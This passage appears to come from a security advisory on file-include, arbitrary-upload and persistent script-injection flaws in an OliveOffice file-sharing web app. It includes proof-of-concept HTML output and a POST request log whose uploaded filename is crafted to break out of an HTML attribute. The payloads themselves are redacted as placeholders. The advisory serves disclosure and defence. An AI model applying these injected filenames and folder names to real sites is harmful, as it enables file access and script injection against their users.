1.1
The file include and arbitrary file upload vulnerability can be exploited by
remote attackers without privilege 
application user account 
and without required user interaction. For demonstration or reproduce ...

PoC: Filename

&lt;div class=&quot;file_list_container&quot;&gt;&lt;div class=&quot;file_list_item&quot;&gt;&lt;table height=&quot;50px&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; 
cellspacing=&quot;0&quot; width=&quot;100%&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td align=&quot;center&quot; valign=&quot;middle&quot; width=&quot;50&quot;&gt;&lt;/td&gt;&lt;td align=&quot;left&quot; 
valign=&quot;middle&quot; width=&quot;*&quot;&gt;&lt;a href=&quot;..&quot;&gt;..&lt;/a&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class=&quot;file_list_item&quot;&gt;&lt;table height=&quot;50px&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; 
cellspacing=&quot;0&quot; width=&quot;100%&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td align=&quot;center&quot; valign=&quot;middle&quot; width=&quot;50&quot;&gt;&lt;/td&gt;&lt;td align=&quot;left&quot; 
valign=&quot;middle&quot; width=&quot;*&quot;&gt;&lt;a href=&quot;&lt;[LOCAL FILE/PATH REQUEST!]&quot;&gt;&lt;/a&gt;                    
(Size:27,27 Kb, Last Modified:2013-07-12 18:34:15)&lt;br /&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class=&quot;file_list_item&quot;&gt;&lt;table width=&quot;100%&quot; height=&quot;50px&quot; border=&quot;0&quot; 
cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td width=&quot;50&quot; align=&quot;center&quot; valign=&quot;middle&quot;&gt;&lt;/td&gt;&lt;td width=&quot;*&quot; 
align=&quot;left&quot; valign=&quot;middle&quot;&gt;&lt;a href=&quot;&gt;&quot;&gt;[LOCAL FILE/PATH REQUEST!]&gt;&lt;/a&gt;                        
(Size:27,27 Kb, Last Modified:2013-07-12 18:33:42)&lt;br /&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;footer&quot;&gt;&lt;div class=&quot;footer_text&quot;&gt;Copyright &copy; 2008 
OliveOffice,Inc.
&lt;/div&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;&lt;/iframe&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;

--- POST Method Request Log ---

POST_DATA[-----------------------------151253266715950
Content-Disposition: form-data; name="file"; filename=">"[LOCAL FILE/PATH
REQUEST!]>.png"
Content-Type: image/png


1.2
the persistent input validation web vulnerability can be exploited by remote
attackers without privilege application 
user account and
with low or medium required user interaction. For demonstration or reproduce
...

PoC: Foldername


&lt;div class=&quot;file_list_container&quot;&gt;&lt;div class=&quot;file_list_item&quot;&gt;&lt;table height=&quot;50px&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; 
cellspacing=&quot;0&quot; width=&quot;100%&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td align=&quot;center&quot; valign=&quot;middle&quot; width=&quot;50&quot;&gt;&lt;/td&gt;&lt;td align=&quot;left&quot; 
valign=&quot;middle&quot; width=&quot;*&quot;&gt;&lt;a href=&quot;..&quot;&gt;..&lt;/a&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class=&quot;file_list_item&quot;&gt;&lt;table height=&quot;50px&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; 
cellspacing=&quot;0&quot; 
width=&quot;100%&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td align=&quot;center&quot; valign=&quot;middle&quot; width=&quot;50&quot;&gt;&lt;/td&gt;&lt;td align=&quot;left&quot; valign=&quot;middle&quot; 
width=&quot;*&quot;&gt;&lt;a href=&quot;%20[PERSISTENT INJECTED SCRIPT CODE!]&gt;&quot; &lt;[PERSISTENT INJECTED SCRIPT CODE!]&quot;&gt;/&quot;&gt;%20&gt;
&quot;&lt;[PERSISTENT INJECTED SCRIPT CODE!]&quot;&gt;/&lt;/a&gt;                     
(Size:0 Kb, Last Modified:2013-07-12 18:26:31)&lt;br /&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;footer&quot;&gt;&lt;div class=&quot;footer_text&quot;&gt;Copyright &copy; 2008 
OliveOffice,Inc.
&lt;/div&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;&lt;/iframe&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;
